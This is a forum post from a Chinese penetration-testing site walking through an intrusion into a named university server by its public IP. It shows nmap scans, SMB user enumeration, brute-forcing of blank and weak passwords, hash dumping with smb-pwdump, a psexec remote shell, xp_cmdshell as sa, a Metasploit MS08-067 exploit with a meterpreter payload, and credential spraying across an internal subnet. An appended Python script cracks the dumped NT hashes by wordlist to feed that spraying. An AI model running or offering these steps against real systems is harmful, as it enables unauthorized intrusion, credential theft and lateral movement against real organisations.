China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: nmap + msf intrusion into Guangxi Normal

Author: admin    Time: 2012-12-4 12:46
Title: nmap + msf intrusion into Guangxi Normal
Guangxi Normal website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to scan for the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection (本地连接):

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the MS08-067 vulnerability against the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames together with the captured hash as logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful. A simple msf + nmap attack ~~
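An added example to go with the smb-pwdump and smb-brute steps in the post above (this is not code from the original post). It takes the "user:rid => LM:NT" lines that smb-pwdump printed, flags accounts that have no password at all, uses the layout of the LM hash to bound the password length (a second LM half of AAD3B435B51404EE means the password is at most 7 characters, which is the case for the test account above), and checks each NT hash against a wordlist using a self-contained MD4, since an NT hash is just MD4 of the UTF-16LE password. The dump text and the wordlist are constructed from the values in this post, and the function names are my own; nothing here touches the network.

```python
"""Triage a pwdump-style hash dump such as the smb-pwdump output above.

Added example, not code from the original post. Parses 'user:rid => LM:NT'
lines, flags blank passwords, bounds the password length from the LM hash
layout, and checks NT hashes against a wordlist using a pure-Python MD4
(NT hash = MD4(password encoded as UTF-16LE)), so it runs offline.
"""
import re
import struct

# One half of the LM hash of an empty password. The full empty LM hash is
# this value twice; a second half equal to it means the password is <= 7 chars.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# NT hash of the empty password (MD4 of the empty string).
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Constructed sample in the format smb-pwdump printed above; pwdump6 writes
# the "NO PASSWORD***" placeholder when the account has no password set.
SAMPLE_DUMP = """\
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""
# Constructed wordlist; a real run would read a candidate file instead.
SAMPLE_WORDLIST = ["password", "admin", "123456", "test"]

# Matches both the nmap form 'user:rid => LM:NT' and pwdump's 'user:rid:LM:NT:::'.
_LINE = re.compile(r"^\|?_?\s*([^:]+):(\d+)(?: => |:)([^:]+):([^:]+)")


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320); implemented here because many OpenSSL builds disable it."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                       # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask, s), b, c
        for i in range(16):                       # round 2
            k, s = (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, s), b, c
        for i in range(16):                       # round 3
            k, s = r3_order[i], (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, s), b, c
        a0, b0 = (a0 + a) & mask, (b0 + b) & mask
        c0, d0 = (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """Windows NT hash as the upper-case hex string pwdump prints."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_dump(text: str) -> list:
    """Return one dict per account line: user, rid, lm, nt (hashes upper-cased)."""
    accounts = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            user, rid, lm, nt = (g.strip() for g in m.groups())
            accounts.append({"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()})
    return accounts


def triage(accounts: list, wordlist: list) -> list:
    """Flag blank passwords, bound length from the LM hash, crack NT by wordlist."""
    lookup = {nt_hash(w): w for w in wordlist}  # hash the wordlist once for all accounts
    findings = []
    for acct in accounts:
        lm, nt = acct["lm"], acct["nt"]
        f = dict(acct, blank=False, lm_stored=False, max_len=None, cracked=None)
        if lm.startswith("NO PASSWORD") or nt.startswith("NO PASSWORD") or nt == EMPTY_NT:
            f["blank"], f["cracked"] = True, ""
        else:
            if lm != EMPTY_LM_HALF * 2:
                # LM hashes the upper-cased password in two 7-byte halves, so a
                # stored LM hash caps the length at 14 (7 if the second half is empty).
                f["lm_stored"] = True
                f["max_len"] = 7 if lm[16:] == EMPTY_LM_HALF else 14
            f["cracked"] = lookup.get(nt)
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(parse_dump(SAMPLE_DUMP), SAMPLE_WORDLIST):
        status = "blank password" if f["blank"] else (
            "cracked: %s" % f["cracked"] if f["cracked"] else "uncracked")
        bound = "" if f["max_len"] is None else " (LM stored, len <= %d)" % f["max_len"]
        print("%-16s rid=%-5d %s%s" % (f["user"], f["rid"], status, bound))
```

Run as-is it prints one line per account. The post's last step put the raw LM hash into password.txt for the subnet-wide smb-brute run; the output of this triage (the plaintext where cracked, otherwise the hash) is what you would write into that file, and the length bound tells you how short a mask to use if the wordlist misses.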

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)    Powered by Discuz! X3.2